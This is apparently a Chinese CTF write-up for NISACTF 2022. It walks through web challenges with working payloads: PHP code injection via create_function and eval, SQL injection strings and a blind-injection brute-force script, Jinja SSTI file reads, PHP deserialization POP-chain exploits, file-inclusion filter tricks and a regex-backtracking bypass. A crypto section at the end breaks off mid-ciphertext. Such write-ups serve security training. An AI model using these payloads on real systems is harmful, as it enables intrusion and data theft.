[NISACTF 2022]

WEB

checkin

打开一看，本来一位就是简单的一道get传参题，结果发现复制的时候出现了问题

所以我就把代码复制到vscode上面来

发现存在Unicode特殊字符，直接把字符原样复制下来，然后URLencode编码一下

最终payload
    ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

level-up

这是一道php特性的题，一共有五个姿势点

level-1

打开一看，什么都没有，crtl+U查看源代码，发现有提示disallow:这个就是robots.txt内容的格式，接着我们就去访问一下

、

level_2_1s_h3re.php

level-2

这是一道很常见的哈希强比较，且禁用了数组，但是有现成的payload，平时练习积攒的，所以这个时候直接拿来用就行了

MD5

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2


&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

SHA1

    

array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

    &array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

Level___3.php

level-3

跟上一关一样，直接拿payload一把梭

level_level_4.php

level-4

<?php
//here is last level
    error_reporting(0);
    include "str.php";
    show_source(__FILE__);

    $str = parse_url($_SERVER['REQUEST_URI']);
    if($str['query'] == ""){
        echo "give me a parameter";
    }
    if(preg_match('/ |_|20|5f|2e|\./',$str['query'])){
        die("blacklist here");
    }
    if($_GET['NI_SA_'] === "txw4ever"){
        die($level5);
    }
    else{
        die("level 4 failed ...");
    }

?> 

这个考点就是php传参的时候会对那些不规范不合法的符号转换为_

主要有以下几个符号

在php中变量名字是由数字字母和下划线组成的，所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线，但是用一个特性是可以绕过的，就是当[提前出现后，后面的点就不会再被转义了，such as：`CTF[SHOW.COM`=>`CTF_SHOW.COM`

这里刚好+号没有被过滤

后来看了一下官方解，原来是考parse_url的解析缺陷

所以构造出另外一个payload如下

http://1.14.71.254:28023///level_level_4.php?NI_SA_=txw4ever

55_5_55.php

level-5

create_function注入，没啥好说的，直接一把梭吧

?a=\create_function&b=}system('tac /flag');//

bingdundun~

点开后有个upload按钮，按下后url发生了变化

尝试把upload修改成index

很明显是一个文件包含漏洞，而且需要配合文件上传使用，这里应该是自动在参数后面添加一个.php，而且文件只能上传图片和压缩包，一般来讲，文件上传的题只会让你上传图片，而这里多出来一个压缩包，就要想到这相关的协议。比如zip://和phar://，这里我用到的是phar伪协议

读取bingdundun_ffllllllag.php文件发现是一个file_get_contents读取/flag?，然后cat根目录

sign_crypto

join-us

登陆界面一打开就有这样一个界面，应该这就是提示了，一个查询框，首先想到的就是sql注入

发现存在sql注入，且数据库中至少存在三条数据

然后fuzz了一下，大概过滤了以下这些关键字

联合注入被ban了，if也没有，看了一下报错注入没有过滤extractvalue，所以就尝试报错注入，and被ban干净了，or没有被ban。

所以尝试如下

tt=1'|| extractvalue(1,concat('~',(select * from aa),'~'))%23

这里不知道为啥or为啥被ban了，但是可以用||代替，然后database被ban了，可以使用这种方法查询到当前数据库名

过滤了等于号，直接用like代替，

爆表名
tt=1'|| extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'),'~'))%23
Fal_flag,output

爆列名的时候发现column关键字被ban，所以就尝试无列名注入

爆列名
tt=1'|| extractvalue(1,concat('~',(select * from (select * from output a join output)c),'~'))%23
data

tt=1'|| extractvalue(1,concat('~',(select * from (select * from Fal_flag a join Fal_flag)c),'~'))%23
id

所以优先查询output列

最终payload

tt=1'|| extractvalue(1,concat('~',(select mid(data,1,20) from output),'~'))%23
NSSCTF{2d21e3f5-90b0
21e3f5-90b0-4330-98c
0-4330-98ca-a1becc60
a-a1becc602f94}
NSSCTF{2d21e3f5-90b0-4330-98ca-a1becc602f94}

不愉快的地方

is secret

扫描目录，发现

看着这个好像有点熟悉，好像那个BUU就有类似的题，这个传入了一个参数，他给我报错了，并且给了我报错信息，发现是flask，且python2.7版本

然后后面测试了一下，发现参数长度大于等于5之后会报错，加密方式不知

在这里可以看到主文件app/app.py的报错信息如上，知道了是RC4加密，且密钥可知

为HereIsTreasure后面为

a=render_template_string(safe(deS))

猜测是模板注入，safe应该是一个过滤函数，所以直接将payloadRC4加密之后传入其中就可以了

ssti的payload如下

{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}

其中使用的是file方法

a="<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type '_io._IOBase'>, <type '_io.IncrementalNewlineDecoder'>, <type 'functools.partial'>, <type '_ssl._SSLContext'>, <type '_ssl._SSLSocket'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <class 'socket._closedsocket'>, <type '_socket.socket'>, <type 'method_descriptor'>, <class 'socket._socketobject'>, <class 'socket._fileobject'>, <type 'datetime.date'>, <type 'datetime.timedelta'>, <type 'datetime.time'>, <type 'datetime.tzinfo'>, <type 'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.methodcaller'>, <type 'collections.deque'>, <type 'deque_iterator'>, <type 'deque_reverse_iterator'>, <type 'itertools.combinations'>, <type 'itertools.combinations_with_replacement'>, <type 'itertools.cycle'>, <type 'itertools.dropwhile'>, <type 'itertools.takewhile'>, <type 'itertools.islice'>, <type 'itertools.starmap'>, <type 'itertools.imap'>, <type 'itertools.chain'>, <type 'itertools.compress'>, <type 'itertools.ifilter'>, <type 'itertools.ifilterfalse'>, <type 'itertools.count'>, <type 'itertools.izip'>, <type 'itertools.izip_longest'>, <type 'itertools.permutations'>, <type 'itertools.product'>, <type 'itertools.repeat'>, <type 'itertools.groupby'>, <type 'itertools.tee_dataobject'>, <type 'itertools.tee'>, <type 'itertools._grouper'>, <type '_thread._localdummy'>, <type 'thread._local'>, <type 'thread.lock'>, <class 'string.Template'>, <class 'string.Formatter'>, <type 'time.struct_time'>, <class 'threading._Verbose'>, <class 'logging.LogRecord'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <type 'select.epoll'>, <type '_hashlib.HASH'>, <type '_random.Random'>, <class 'contextlib.GeneratorContextManager'>, <class 'contextlib.closing'>, <type 'Struct'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.types.ParamType'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'werkzeug.serving.WSGIRequestHandler'>, <class 'werkzeug.serving._SSLContext'>, <class 'werkzeug.serving.BaseWSGIServer'>, <class 'urlparse.ResultMixin'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'email.LazyImporter'>, <class 'calendar.Calendar'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.wrappers.base_request.BaseRequest'>, <class 'werkzeug.wrappers.base_response.BaseResponse'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.wrappers.cors.CORSRequestMixin'>, <class 'werkzeug.wrappers.cors.CORSResponseMixin'>, <class 'werkzeug.useragents.UserAgentParser'>, <class 'werkzeug.useragents.UserAgent'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <type '_json.Scanner'>, <type '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <class 'markupsafe._MarkupEscapeHelper'>, <type 'cPickle.Unpickler'>, <type 'cPickle.Pickler'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.idtracking.Symbols'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.runtime.TemplateReference'>, <class 'numbers.Number'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal._ContextManager'>, <class 'decimal.Context'>, <class 'decimal._WorkRep'>, <class 'decimal._Log10Memoize'>, <type '_ast.AST'>, <class 'ast.NodeVisitor'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <class 'difflib.HtmlDiff'>, <class 'uuid.UUID'>, <type 'CArgObject'>, <type '_ctypes.CThunkObject'>, <type '_ctypes._CData'>, <type '_ctypes.CField'>, <type '_ctypes.DictRemover'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <class 'subprocess.Popen'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'itsdangerous._json._CompactJSON'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'flask.wrappers.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <class 'werkzeug.debug.repr._Helper'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>, <class 'werkzeug.debug.repr.DebugReprGenerator'>, <class 'werkzeug.debug.console.HTMLStringO'>, <class 'werkzeug.debug.console.ThreadedStream'>, <class 'werkzeug.debug.console._ConsoleLoader'>, <class 'werkzeug.debug.console.Console'>, <class 'werkzeug.debug.tbtools.Line'>, <class 'werkzeug.debug.tbtools.Traceback'>, <class 'werkzeug.debug.tbtools.Group'>, <class 'werkzeug.debug.tbtools.Frame'>, <class 'werkzeug.debug._ConsoleFrame'>, <class 'werkzeug.debug.DebuggedApplication'>, <class 'werkzeug._reloader.ReloaderLoop'>, <class 'email.feedparser.BufferedSubFile'>, <type 'unicodedata.UCD'>, <type 'array.array'>, <type 'method-wrapper'>".split(", ")
q=0
for i in a:
    print(q,i)
    q+=1

最终payload

secret?secret=.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

babyserialize

 <?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

一个简单的反序列化，pop链非常好找，入口点就是TianXiWei::__wakeup()，出口点就是NISA:__invoke(),

直接构造出exp如下

<?php
class NISA{
    public $fun;
    public $txw4ever;
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a="TXW4EVER";
    private $fun='abc';
}
$n1=new NISA();
$n2=new NISA();
$t=new TianXiWei();
$i=new Ilovetxw();
$f=new four();

$n2->txw4ever="echo scandir('/')[6].scandir('/')[7].scandir('/')[9].scandir('/')[8].scandir('/')[5];";

$i->su=$n2;

$n1->fun=$i;

$f->a=$n1;

$t->x="sixsixsix";
$t->ext=$f;
echo urlencode(serialize($t));

这里命令执行的时候加了waf，而且还是黑盒测试，最后用scandir[]数组的形式获取到了flag的文件名

然后再用copy命令读文件就行了

copy('/fllllllaaag','1.txt');

后面去看了一下官方解，发现结果是用php原生类，亏我才学完php原生类利用，淦

payload如下

echo new GlobIterator(\"/f*\");
读文件名
$N1->txw4ever = "echo new SplFileObject(\"php://filter/convert.base64-encode/resource=/fllllllaaag\");";
读文件

easyssrf

file协议读文件没读到，提示说/fl4g

提示说有ha1x1ux1u.php文件

打开发现是一道题

没啥难度，直接filter过滤器读文件就行，而且这道题也没考啥SSRF啊，就一个协议题

babyupload

打开题目源码，访问source路径

下载得到一个python文件，可以知道这是一个flask项目，这就开始了审代码环节

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuid

app = Flask(__name__)

SCHEMA = """CREATE TABLE files (
id text primary key,
path text
);
"""


def db():
    g_db = getattr(g, '_database', None)
    if g_db is None:
        g_db = g._database = sqlite3.connect("database.db")
    return g_db


@app.before_first_request
def setup():
    os.remove("database.db")
    cur = db().cursor()
    cur.executescript(SCHEMA)


@app.route('/')
def hello_world():
    return """<!DOCTYPE html>
<html>
<body>
<form action="/upload" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="file">
    <input type="submit" value="Upload File" name="submit">
</form>
<!-- /source -->
</body>
</html>"""


@app.route('/source')
def source():
    return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)


@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']
    if "." in file.filename:
        return "Bad filename!", 403
    conn = db()
    cur = conn.cursor()
    uid = uuid.uuid4().hex
    try:
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()

    file.save('uploads/' + file.filename)
    return redirect('/file/' + uid)


@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))
    res = cur.fetchone()
    if res is None:
        return "File not found", 404

    # print(res[0])

    with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()

主要漏洞在这里

也就是说，我们让res[0]为/flag就行了

hardsql

题目描述：

$password=$_POST['passwd'];
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";

题目描述看起来非常简单，但是估计上了一个强的waf

打开题目，描述的是，登陆成功就能拿到flag，所以就不需要注入了，只要让他查询到数据就行

也就是说存在用户bilala

存在waf，fuzz一下

过滤得有点多，简单看一下那几个常见的注入方式

好像大部分都被ban了，而且不能用万能密码了

这里可以使用模糊匹配，用like，而且是已知列名passwd和表名users的

成功匹配到第一位为b

写个python脚本跑一下密码

import requests

url = 'http://1.14.71.254:28042/login.php'
dict = '0123456789qwertyuiopasdfghjklzxcvbnm-'
flag = ''
for j in range(50):
    for i in dict:
        data = {
            "username": "bilala",
            "passwd": f"-1'/**/or/**/passwd/**/like/**/'{flag+i}%'#"
        }
        # print(data)
        res = requests.post(url=url, data=data)
        # print(res.text)
        if 'nothing found' not in res.text:
            # print(i)
            # print(res.text)
            flag+=i
            print(flag)
            break

密码为

b2f2d15b3ae082ca29697d8dcd420fd7

登陆进去拿到源码，真就亿点过滤

这里拿到flag的条件就是密码不为b2f2d15b3ae082ca29697d8dcd420fd7且能登陆成功，这不就是buu上的那道原题吗，用replace构造相同的输入和输出

直接拿那个时候的payload来打一下

'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')
此为官方的payload

middlerce

<?php
include "check.php";
if (isset($_REQUEST['letter'])){
    $txw4ever = $_REQUEST['letter'];
    if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){
        die("再加把油喔");
    }
    else{
        $command = json_decode($txw4ever,true)['cmd'];
        checkdata($command);
        @eval($command);
    }
}
else{
    highlight_file(__FILE__);
}
?>

过滤

/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m

这里可以采用正则回溯绕过，可以参考https://www.freebuf.com/articles/web/190794.html

exp

import requests

url = 'http://1.14.71.254:28288/'
payload = '{"cmd":"?><?=`tail /f*`?>","+":"' + '+' * 1000000 + '"}'
# print(payload)
res = requests.post(url=url, data={"letter": payload})
print(res.text)

midlevel

打开一看，我寻思这不是原题吗，BUU上有一道差不多的smarty注入，xff构造

我试着直接打一下

很显然可以，试一下能不能用判断语句执行命令

接下来就是命令执行了

OK，纯纯的原题

popchains

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

一道pop链的题，非常简单，直接一把梭出exp

class Road_is_Long{
    public $page;
    public $string;
}

class Try_Work_Hard{
    protected  $var="php://filter/read=convert.base64-encode/resource=index.php";
}

class Make_a_Change{
    public $effort;
}
$road1=new Road_is_Long();
$road2=new Road_is_Long();
$try=new Try_Work_Hard();
$make=new Make_a_Change();



$make->effort=$try;
$road2->string=$make;
$road1->page=$road2;
$ser=serialize($road1);
echo urlencode($ser);

payload

?wish=O%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BN%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A{s%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A{s%3A6%3A"%00*%00var"%3Bs%3A62%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fflag"%3B}}}s%3A6%3A"string"%3BN%3B}

Crypto

sign_crypto

此为LaTeX字符，直接拿到网站上去识别一下，或者是自己对照表一一替换

然后得到以下字符

\ni \Sigma \Sigma \chi \Theta \forall\left\{\eta \diamond \infty \tau_{n i s a} \widehat{\lambda i} \int \hookleftarrow \hookleftarrow^{\prime} \Lambda \tau \ell \Xi\right\}

观察每一个字符的首字母可以发现，前六位分别为NSSCTF后面就是花括号了，所以说这个flag就是表对应的字符的首字符了

所以写出对应的flag如下

NSSCTF{EDIT_WLIHHPLTEXR}

考虑到flag应该是有意义的，所以针对edit后面的字符，手动去对照表一次，表，这个过程有点费眼睛，慢慢看，我的建议是在网站对照，然后编辑，因为涉及到有些符号长得特别像，这个时候就要根据结果去猜了

由此得到新的flag

NSSCTF{EDIT_WITH_LATEX}

所以还是人工看比较准确

normal

题目

..... ..... ..... ...!? !!.?. ..... ..... ..... ..?.? !.?.. ..... .....
..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .!... ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?....
..... ..... ....! .!!!! !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... !.... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?. ..... ..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.?
!.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!.
!.... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... .....
..... ...!. !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... .!... !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... .....
..?.? !.?!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!!
!!!!! !!.!. ..... ..... ....! .!!!! !!!.? ..... ..... ...!? !!.?. .....
